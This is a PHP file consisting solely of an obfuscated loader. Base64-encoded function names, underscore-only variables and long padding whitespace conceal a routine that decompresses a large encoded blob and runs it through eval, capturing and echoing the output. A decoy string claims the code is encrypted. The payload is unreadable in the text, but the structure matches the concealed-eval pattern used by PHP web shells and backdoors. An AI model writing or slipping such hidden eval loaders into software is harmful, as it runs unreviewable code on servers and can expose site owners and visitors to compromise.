<?php 
        $__='printf';$_='Loading This code is encrypted!';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;